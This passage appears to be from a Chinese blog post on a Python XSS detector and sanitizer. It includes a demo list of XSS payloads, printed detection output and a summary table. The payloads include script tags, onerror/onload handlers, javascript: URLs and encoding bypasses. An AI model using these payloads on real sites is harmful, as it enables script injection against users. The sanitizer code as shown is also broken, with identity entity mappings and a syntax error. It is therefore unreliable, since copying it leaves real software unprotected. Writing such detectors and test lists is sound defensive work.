(re.compile(r'<!--.*?-->', re.DOTALL), ''),
]
def sanitize_input(self, user_input, context="general"):
"""Sanitize input by removing or encoding dangerous content"""
sanitized = user_input
for pattern, replacement in self.replacement_rules:
sanitized = pattern.sub(replacement, sanitized)
if context == "html":
sanitized = self._sanitize_html(sanitized)
elif context == "attribute":
sanitized = self._sanitize_attribute(sanitized)
elif context == "javascript":
sanitized = self._sanitize_javascript(sanitized)
elif context == "url":
sanitized = self._sanitize_url(sanitized)
return sanitized
def _sanitize_html(self, text):
"""Sanitize for HTML context"""
dangerous_chars = {
'<': '<',
'>': '>',
'"': '"',
"'": ''',
'/': '/',
'&': '&'
}
result = text
for char, encoded in dangerous_chars.items():
result = result.replace(char, encoded)
return result
def _sanitize_attribute(self, text):
"""Sanitize for HTML attribute context"""
return self._sanitize_html(text).replace('"', '"')
def _sanitize_javascript(self, text):
"""Sanitize for JavaScript context"""
return text.replace('\', '\\').replace('"', '\"').replace("'", "\'")
def _sanitize_url(self, text):
"""Sanitize for URL context"""
try:
from urllib import quote
return quote(text, safe='')
except:
import re
return re.sub(r'[^\w-_.~]', lambda m: '%%%02x' % ord(m.group(0)), text)
def validate_and_sanitize(self, user_input, context="general"):
"""Validate and sanitize input"""
result = self.detector.detect(user_input, context)
if result.is_xss:
sanitized = self.sanitize_input(user_input, context)
result.sanitized_input = sanitized
return True, sanitized, result
return False, user_input, result
def check_safety(self, user_input, context="general"):
"""Check input safety without sanitization"""
return self.detector.detect(user_input, context)
def demo():
"""Demonstration of XSS detection and protection"""
print("=" * 70)
print("XSS Detection and Protection System Demo")
print("=" * 70)
protector = XSSProtector()
test_cases = [
("<script>alert('XSS')</script>", "html", "Basic script injection"),
("<img src=x onerror=alert('XSS')>", "html", "Image onerror event"),
("<svg onload=alert('XSS')>", "html", "SVG onload event"),
("<scr<script>ipt>alert(1)</scr<script>ipt>", "html", "Nested script bypass"),
("<img src=x onerror=alert(1)>", "html", "Event handler bypass"),
("javascript:alert(1)", "url", "JavaScript protocol"),
("<iframe src='javascript:alert(1)'>", "html", "Iframe with JS protocol"),
("<input type='text' value='' onfocus='alert(1)'>", "html", "Stored XSS vector"),
("<script>document.write('<img src=x onerror=alert(1)>')</script>", "html", "DOM-based XSS"),
("eval('alert(1)')", "javascript", "Eval injection"),
("<img src=x onerror=alert(1)>", "html", "HTML entity encoding"),
("<script>\u0061lert(1)</script>", "html", "Unicode escape"),
("<div style='background:url(javascript:alert(1))'>", "html", "CSS JavaScript"),
("Hello World", "html", "Normal text"),
("<p>Hello</p>", "html", "Simple paragraph"),
("https://example.com", "url", "Safe URL"),
]
for user_input, context, description in test_cases:
print("%s" % "="*70)
print("Test: %s" % description)
print("Context: %s" % context)
display_input = user_input[:60] + '...' if len(user_input) > 60 else user_input
print("Input: %s" % display_input)
print("-" * 70)
result = protector.check_safety(user_input, context)
print("XSS Detected: %s" % ('YES' if result.is_xss else 'NO'))
print("Risk Level: %s" % result.risk_level)
if result.matched_patterns:
print("Patterns: %s" % ", ".join(result.matched_patterns[:3]))
if result.attack_types:
print("Attack Types: %s" % ", ".join(result.attack_types))
print("Analysis:")
print(result.analysis_details)
print("%s" % "="*70)
print("Input Sanitization Demo")
print("=" * 70)
malicious_input = "<script>alert('XSS')</script><img src=x onerror=alert(1)>"
is_detected, sanitized, result = protector.validate_and_sanitize(malicious_input, "html")
print("\nOriginal: %s" % malicious_input)
print("XSS Detected: %s" % is_detected)
print("Sanitized: %s" % sanitized)
print("Risk Level: %s" % result.risk_level)
if __name__ == "__main__":
demo()
运行结果
//运行结果
======================================================================
XSS Detection and Protection System Demo
======================================================================
======================================================================
Test: Basic script injection
Context: html
Input: <script>alert('XSS')</script>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Script Tag Injection, Script Tag Self-Closing, Dangerous Tag Usage
Attack Types: vector
Analysis:
Context: html
Rule-based Detection: 3 patterns matched
CRITICAL (2): Script Tag Injection, Script Tag Self-Closing
HIGH (1): Dangerous Tag Usage
Semantic Analysis: 1 anomalies
- Dangerous Tag Usage: Found dangerous tags: script
Attack Types: vector
======================================================================
Test: Image onerror event
Context: html
Input: <img src=x onerror=alert('XSS')>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, Img onerror, Event Handler Detection
Attack Types: vector
Analysis:
Context: html
Rule-based Detection: 3 patterns matched
CRITICAL (3): Event Handler on*, Img onerror, Event Handler Detection
Semantic Analysis: 1 anomalies
- Event Handler Detection: Found event handlers: onerror
Attack Types: vector
======================================================================
Test: SVG onload event
Context: html
Input: <svg onload=alert('XSS')>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, SVG onload Event, Unbalanced HTML Tags
Attack Types: vector, bypass
Analysis:
Context: html
Rule-based Detection: 5 patterns matched
CRITICAL (2): Event Handler on*, Event Handler Detection
HIGH (2): SVG onload Event, Dangerous Tag Usage
MEDIUM (1): Unbalanced HTML Tags
Semantic Analysis: 3 anomalies
- Unbalanced HTML Tags: Detected potentially malicious unbalanced tags
- Dangerous Tag Usage: Found dangerous tags: svg
- Event Handler Detection: Found event handlers: onload
Attack Types: bypass, vector, vector
======================================================================
Test: Nested script bypass
Context: html
Input: <scr<script>ipt>alert(1)</scr<script>ipt>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Script Tag Self-Closing, Dangerous Tag Usage
Attack Types: vector
Analysis:
Context: html
Rule-based Detection: 2 patterns matched
CRITICAL (1): Script Tag Self-Closing
HIGH (1): Dangerous Tag Usage
Semantic Analysis: 1 anomalies
- Dangerous Tag Usage: Found dangerous tags: script
Attack Types: vector
======================================================================
Test: Event handler bypass
Context: html
Input: <img src=x onerror=alert(1)>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, Img onerror, Event Handler Detection
Attack Types: vector
Analysis:
Context: html
Rule-based Detection: 3 patterns matched
CRITICAL (3): Event Handler on*, Img onerror, Event Handler Detection
Semantic Analysis: 1 anomalies
- Event Handler Detection: Found event handlers: onerror
Attack Types: vector
======================================================================
Test: JavaScript protocol
Context: url
Input: javascript:alert(1)
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: JavaScript Protocol, Dangerous Protocol Handler, JavaScript in URL
Attack Types: vector, bypass
Analysis:
Context: url
Rule-based Detection: 3 patterns matched
CRITICAL (3): JavaScript Protocol, Dangerous Protocol Handler, JavaScript in URL
Semantic Analysis: 2 anomalies
- Dangerous Protocol Handler: Found dangerous protocols: javascript:
- JavaScript in URL: JavaScript protocol in URL context
Attack Types: bypass
======================================================================
Test: Iframe with JS protocol
Context: html
Input: <iframe src='javascript:alert(1)'>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: JavaScript Protocol, Iframe Injection, Iframe with JavaScript
Attack Types: vector, bypass
Analysis:
Context: html
Rule-based Detection: 6 patterns matched
CRITICAL (3): JavaScript Protocol, Iframe with JavaScript, Dangerous Protocol Handler
HIGH (2): Iframe Injection, Dangerous Tag Usage
MEDIUM (1): Unbalanced HTML Tags
Semantic Analysis: 3 anomalies
- Unbalanced HTML Tags: Detected potentially malicious unbalanced tags
- Dangerous Tag Usage: Found dangerous tags: iframe
- Dangerous Protocol Handler: Found dangerous protocols: javascript:
Attack Types: bypass, vector, bypass
======================================================================
Test: Stored XSS vector
Context: html
Input: <input type='text' value='' onfocus='alert(1)'>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, Unbalanced HTML Tags, Dangerous Tag Usage
Attack Types: vector, bypass
Analysis:
Context: html
Rule-based Detection: 4 patterns matched
CRITICAL (2): Event Handler on*, Event Handler Detection
HIGH (1): Dangerous Tag Usage
MEDIUM (1): Unbalanced HTML Tags
Semantic Analysis: 3 anomalies
- Unbalanced HTML Tags: Detected potentially malicious unbalanced tags
- Dangerous Tag Usage: Found dangerous tags: input
- Event Handler Detection: Found event handlers: onfocus
Attack Types: bypass, vector, vector
======================================================================
Test: DOM-based XSS
Context: html
Input: <script>document.write('<img src=x onerror=alert(1)>')</scri...
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Script Tag Injection, Script Tag Self-Closing, Event Handler on*
Attack Types: vector, dom
Analysis:
Context: html
Rule-based Detection: 8 patterns matched
CRITICAL (5): Script Tag Injection, Script Tag Self-Closing, Event Handler on*
HIGH (3): Document Write, Dangerous Tag Usage, DOM Manipulation Pattern
Semantic Analysis: 3 anomalies
- Dangerous Tag Usage: Found dangerous tags: script
- Event Handler Detection: Found event handlers: onerror
- DOM Manipulation Pattern: Found potential DOM manipulation
Attack Types: vector, vector, dom
======================================================================
Test: Eval injection
Context: javascript
Input: eval('alert(1)')
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: high
Patterns: Eval Usage, DOM Manipulation Pattern
Attack Types: dom
Analysis:
Context: javascript
Rule-based Detection: 2 patterns matched
HIGH (2): Eval Usage, DOM Manipulation Pattern
Semantic Analysis: 1 anomalies
- DOM Manipulation Pattern: Found potential DOM manipulation
Attack Types: dom
======================================================================
Test: HTML entity encoding
Context: html
Input: <img src=x onerror=alert(1)>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, HTML Entity Encoding, Img onerror
Attack Types: vector, bypass
Analysis:
Context: html
Rule-based Detection: 5 patterns matched
CRITICAL (3): Event Handler on*, Img onerror, Event Handler Detection
MEDIUM (2): HTML Entity Encoding, Encoding Obfuscation
Semantic Analysis: 2 anomalies
- Event Handler Detection: Found event handlers: onerror
- Encoding Obfuscation: Found encoding: HTML Entity
Attack Types: vector, bypass
======================================================================
Test: Unicode escape
Context: html
Input: <script>\u0061lert(1)</script>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Script Tag Injection, Script Tag Self-Closing, Unicode Escape
Attack Types: vector, bypass
Analysis:
Context: html
Rule-based Detection: 5 patterns matched
CRITICAL (2): Script Tag Injection, Script Tag Self-Closing
HIGH (1): Dangerous Tag Usage
MEDIUM (2): Unicode Escape, Encoding Obfuscation
Semantic Analysis: 2 anomalies
- Dangerous Tag Usage: Found dangerous tags: script
- Encoding Obfuscation: Found encoding: Unicode
Attack Types: vector, bypass
======================================================================
Test: CSS JavaScript
Context: html
Input: <div style='background:url(javascript:alert(1))'>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: JavaScript Protocol, CSS Expression, Dangerous Protocol Handler
Attack Types: vector, bypass
Analysis:
Context: html
Rule-based Detection: 3 patterns matched
CRITICAL (2): JavaScript Protocol, Dangerous Protocol Handler
HIGH (1): CSS Expression
Semantic Analysis: 1 anomalies
- Dangerous Protocol Handler: Found dangerous protocols: javascript:
Attack Types: bypass
======================================================================
Test: Normal text
Context: html
Input: Hello World
----------------------------------------------------------------------
XSS Detected: NO
Risk Level: safe
Analysis:
Context: html
Rule-based Detection: No attack patterns detected
Semantic Analysis: No anomalies detected
======================================================================
Test: Simple paragraph
Context: html
Input: <p>Hello</p>
----------------------------------------------------------------------
XSS Detected: NO
Risk Level: safe
Analysis:
Context: html
Rule-based Detection: No attack patterns detected
Semantic Analysis: No anomalies detected
======================================================================
Test: Safe URL
Context: url
Input: https://example.com
----------------------------------------------------------------------
XSS Detected: NO
Risk Level: safe
Analysis:
Context: url
Rule-based Detection: No attack patterns detected
Semantic Analysis: No anomalies detected
======================================================================
Input Sanitization Demo
======================================================================
Original: <script>alert('XSS')</script><img src=x onerror=alert(1)>
XSS Detected: True
Sanitized: &lt;script&gt;...&lt;&#x2F;script&gt;&lt;img src=x
Risk Level: critical
| 序号 | 测试用例 | 输入内容(摘要) | 检测结果 | 风险等级 | 攻击类型 |
|---|---|---|---|---|---|
| 1 | 基础脚本注入 | <script>alert('XSS')</script> | 是 | 严重 | vector |
| 2 | 图片 onerror 事件 | <img src=x onerror=alert('XSS')> | 是 | 严重 | vector |
| 3 | SVG onload 事件 | <svg onload=alert('XSS')> | 是 | 严重 | vector, bypass |
| 4 | 嵌套脚本绕过 | <scr<script>ipt>alert(1)</scr<script>ipt> | 是 | 严重 | vector |
| 5 | 事件处理绕过 | <img src=x onerror=alert(1)> | 是 | 严重 | vector |
| 6 | JavaScript 协议 | javascript:alert(1) | 是 | 严重 | vector, bypass |
| 7 | iframe + JS 协议 | <iframe src='javascript:alert(1)'> | 是 | 严重 | vector, bypass |
| 8 | 存储型 XSS 向量 | <input type='text' value='' onfocus='alert(1)'> | 是 | 严重 | vector, bypass |
| 9 | DOM 型 XSS | <script>document.write('<img src=x onerror=alert(1)>')</scri... | 是 | 严重 | vector, dom |
| 10 | eval 注入 | eval('alert(1)') | 是 | 高 | dom |
| 11 | HTML 实体编码绕过 | <img src=x onerror=alert(1)> | 是 | 严重 | vector, bypass |
| 12 | Unicode 转义绕过 | <script>\u0061lert(1)</script> | 是 | 严重 | vector, bypass |
| 13 | CSS 中的 JavaScript | <div style='background:url(javascript:alert(1))'> | 是 | 严重 | vector, bypass |
| 14 | 正常文本 | Hello World | 否 | 安全 | - |
| 15 | 简单段落 | <p>Hello</p> | 否 | 安全 | - |
| 16 | 安全 URL | https://example.com | 否 | 安全 | - |
说明:
- “输入内容”部分已做简化,完整内容请参考原始输出。
- “攻击类型”中
vector表示常规反射/存储型 XSS 向量,bypass表示绕过类攻击,dom表示 DOM 型 XSS。 - 风险等级根据原始输出中的
critical(严重)和high(高)对应为“严重”和“高”。
打XSS初级靶场的建议参考文章或直接CTFhub走起:
www.cnblogs.com/L00kback/p/…